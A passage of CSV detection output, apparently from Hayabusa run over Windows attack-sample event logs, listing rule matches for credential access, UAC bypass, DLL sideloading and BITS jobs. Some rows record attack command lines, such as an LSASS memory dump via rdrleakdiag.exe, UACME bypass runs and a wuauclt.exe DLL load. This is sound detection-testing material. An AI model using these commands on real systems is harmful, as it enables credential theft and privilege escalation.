Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx -2020-09-24 01:50:16.702 +09:00,01566s-win16-ir.threebeesco.com,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx -2020-09-24 01:50:16.892 +09:00,01566s-win16-ir.threebeesco.com,1,informational,Process Creation,Command: C:\Windows\system32\WerFault.exe -u -p 5424 -s 4616 : Path: C:\Windows\System32\WerFault.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx -2020-09-24 01:50:17.194 +09:00,01566s-win16-ir.threebeesco.com,4776,informational,NTLM Logon to Local Account,User: Administrator : Workstation : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx -2020-09-24 01:50:17.194 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: - : IP Address: 172.16.66.37 : Port: 50107 : LogonID: 0x1137987,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx -2020-09-24 01:50:17.200 +09:00,01566s-win16-ir.threebeesco.com,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx -2020-09-24 01:50:19.821 +09:00,01566s-win16-ir.threebeesco.com,1,informational,Process Creation,Command: C:\Windows\system32\wermgr.exe -upload : Path: 
C:\Windows\System32\wermgr.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx -2020-09-28 21:47:36.197 +09:00,DESKTOP-PIU87N6,1,informational,Process Creation,"Command: rdrleakdiag.exe /p 668 /o C:\Users\wanwan\Desktop /fullmemdmp /snap : Path: C:\Windows\System32\rdrleakdiag.exe : User: DESKTOP-PIU87N6\wanwan : Parent Command: ""C:\WINDOWS\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx -2020-09-28 21:47:36.215 +09:00,DESKTOP-PIU87N6,1,informational,Process Creation,Command: C:\WINDOWS\system32\lsass.exe : Path: C:\Windows\System32\lsass.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\WINDOWS\system32\lsass.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx -2020-09-28 21:47:36.215 +09:00,DESKTOP-PIU87N6,1,critical,Suspicious LSASS Process Clone,,rules/sigma/process_creation/win_susp_lsass_clone.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx -2020-10-02 03:35:02.415 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: POC.exe : Path: C:\Users\Public\POC\bin\Debug\POC.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx -2020-10-02 03:35:02.415 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx -2020-10-02 
03:35:02.606 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: Program : Path: C:\Users\Public\POC\bin\Debug\POC.exe : User: MSEDGEWIN10\IEUser : Parent Command: POC.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx -2020-10-02 03:35:02.606 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx -2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: C:\windows\system32\taskmgr.exe : Path: C:\Windows\System32\Taskmgr.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: Akagi_64.exe 59 cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx -2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: C:\windows\system32\taskmgr.exe : Path: C:\Windows\System32\Taskmgr.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: Akagi_64.exe 59 cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx -2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: C:\windows\system32\taskmgr.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx -2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,low,Taskmgr as Parent,,rules/sigma/process_creation/win_susp_taskmgr_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx -2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : 
Parent Command: C:\windows\system32\taskmgr.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx -2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,low,Taskmgr as Parent,,rules/sigma/process_creation/win_susp_taskmgr_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx -2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Windows\System32\mmc.exe"" WF.msc",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx -2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx -2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx -2020-10-07 06:40:30.910 +09:00,02694w-win10.threebeesco.com,7,medium,Unsigned Image Loaded Into LSASS Process,,rules/sigma/image_load/sysmon_unsigned_image_loaded_into_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ImageLoad_NFSH_Sysmon_7.evtx -2020-10-07 06:40:42.943 +09:00,02694w-win10.threebeesco.com,7,medium,Unsigned Image Loaded Into LSASS Process,,rules/sigma/image_load/sysmon_unsigned_image_loaded_into_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ImageLoad_NFSH_Sysmon_7.evtx -2020-10-07 07:11:17.814 +09:00,02694w-win10.threebeesco.com,13,high,DLL Load via LSASS,,rules/sigma/registry_event/sysmon_susp_lsass_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx -2020-10-07 07:11:17.848 +09:00,02694w-win10.threebeesco.com,12,high,DLL Load via LSASS,,rules/sigma/registry_event/sysmon_susp_lsass_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx -2020-10-14 05:11:42.278 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: c:\windows\system32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: wuauclt.exe /UpdateDeploymentProvider C:\ProgramData\Intel\helpa.dll /RunHandlerComServer ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/evasion_execution_imageload_wuauclt_lolbas.evtx -2020-10-14 05:11:42.279 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: c:\windows\system32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: wuauclt.exe /UpdateDeploymentProvider C:\ProgramData\Intel\helpa.dll /RunHandlerComServer ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/evasion_execution_imageload_wuauclt_lolbas.evtx -2020-10-15 22:17:02.403 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\smartscreen.exe -Embedding : Path: C:\Windows\System32\smartscreen.exe : User: MSEDGEWIN10\IEUser : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx -2020-10-15 22:17:02.736 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx -2020-10-15 22:17:02.736 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys 
Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx -2020-10-15 22:17:02.736 +09:00,MSEDGEWIN10,13,high,New RUN Key Pointing to Suspicious Folder,,rules/sigma/registry_event/sysmon_susp_run_key_img_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx -2020-10-15 22:17:02.737 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Program Files (x86)\Internet Explorer\iexplore.exe"" : Path: C:\Program Files (x86)\Internet Explorer\iexplore.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Users\Public\tools\apt\tendyron.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx -2020-10-17 20:38:58.613 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-17 20:43:27.499 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\Public\tools\apt\wwlib\test.exe"" : Path: C:\Users\Public\tools\apt\wwlib\test.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx -2020-10-17 20:43:27.499 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx -2020-10-17 
20:43:31.484 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\Public\tools\apt\wwlib\test.exe"" : Path: C:\Users\Public\tools\apt\wwlib\test.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx -2020-10-17 20:43:31.484 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx -2020-10-17 20:43:31.484 +09:00,MSEDGEWIN10,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx -2020-10-17 20:43:33.495 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart : Path: C:\Users\IEUser\AppData\Roaming\WINWORD.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Users\Public\tools\apt\wwlib\test.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx -2020-10-17 20:43:36.306 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx -2020-10-17 20:43:36.306 +09:00,MSEDGEWIN10,1,high,Microsoft Office Product Spawning Windows 
Shell,,rules/sigma/process_creation/win_office_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx -2020-10-17 20:43:40.902 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\explorer.exe"" : Path: C:\Windows\SysWOW64\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx -2020-10-17 20:43:40.903 +09:00,MSEDGEWIN10,8,high,CACTUSTORCH Remote Thread Creation,,rules/sigma/create_remote_thread/sysmon_cactustorch.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx -2020-10-17 20:43:45.120 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\IEUser\AppData\Roaming\WINWORD.exe"" : Path: C:\Users\IEUser\AppData\Roaming\WINWORD.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx -2020-10-17 20:43:45.120 +09:00,MSEDGEWIN10,1,high,MS Office Product Spawning Exe in User Dir,,rules/sigma/process_creation/win_office_spawn_exe_from_users_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx -2020-10-17 20:43:49.229 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c ping 127.0.0.1&&del del /F /Q /A:H ""C:\Users\IEUser\AppData\Roaming\wwlib.dll"" : Path: C:\Windows\SysWOW64\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Users\IEUser\AppData\Roaming\WINWORD.exe 
--xStart",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx -2020-10-17 20:43:49.229 +09:00,MSEDGEWIN10,1,high,Microsoft Office Product Spawning Windows Shell,,rules/sigma/process_creation/win_office_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx -2020-10-17 20:50:02.661 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{ACA8FE61-4C38-4216-A89C-9F88343DF21F}-GoogleUpdateSetup.exe : URL: http://r3---sn-5hnedn7z.gvt1.com/edgedl/release2/update2/HvaldRNSrX7_feOQD9wvGQ_1.3.36.32/GoogleUpdateSetup.exe?cms_redirect=yes&mh=Aq&mip=213.127.67.142&mm=28&mn=sn-5hnedn7z&ms=nvh&mt=1602935359&mv=m&mvi=3&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-17 21:32:08.987 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{8B60600B-E6B4-4083-99F3-D3A4CFB95796}-86.0.4240.75_85.0.4183.121_chrome_updater.exe : URL: http://r2---sn-5hne6nsr.gvt1.com/edgedl/release2/chrome/W_YanCvPLKRFNu-eN8kKOw_86.0.4240.75/86.0.4240.75_85.0.4183.121_chrome_updater.exe?cms_redirect=yes&mh=ps&mip=213.127.67.142&mm=28&mn=sn-5hne6nsr&ms=nvh&mt=1602937879&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-17 21:32:11.026 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and 
Control/bits_openvpn.evtx -2020-10-17 21:32:11.318 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-17 21:32:11.574 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: SetupBinary : URL: https://oneclient.sfx.ms/Win/Prod/20.169.0823.0006/OneDriveSetup.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-17 21:33:56.406 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 01:27:08.081 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: calc.exe : Path: C:\Windows\SysWOW64\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\ProgramData\Intel\CV.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx -2020-10-18 01:27:08.734 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2008.2.0_x64__8wekyb3d8bbwe\Calculator.exe"" -ServerName:App.AppXsm3pg4n7er43kdh1qp4e79f1j7am68r8.mca : Path: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2008.2.0_x64__8wekyb3d8bbwe\Calculator.exe : User: MSEDGEWIN10\IEUser : Parent Command: ?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx -2020-10-18 01:27:10.464 
+09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\RuntimeBroker.exe -Embedding : Path: C:\Windows\System32\RuntimeBroker.exe : User: MSEDGEWIN10\IEUser : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx -2020-10-18 07:37:52.809 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 07:37:52.892 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 07:37:52.956 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 07:37:52.991 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: 
https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 07:37:53.047 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 07:37:53.111 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 07:37:53.169 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 07:37:53.230 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 07:37:53.417 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: 
https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 07:37:53.527 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 07:37:53.571 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 07:37:53.664 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 07:37:53.771 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 
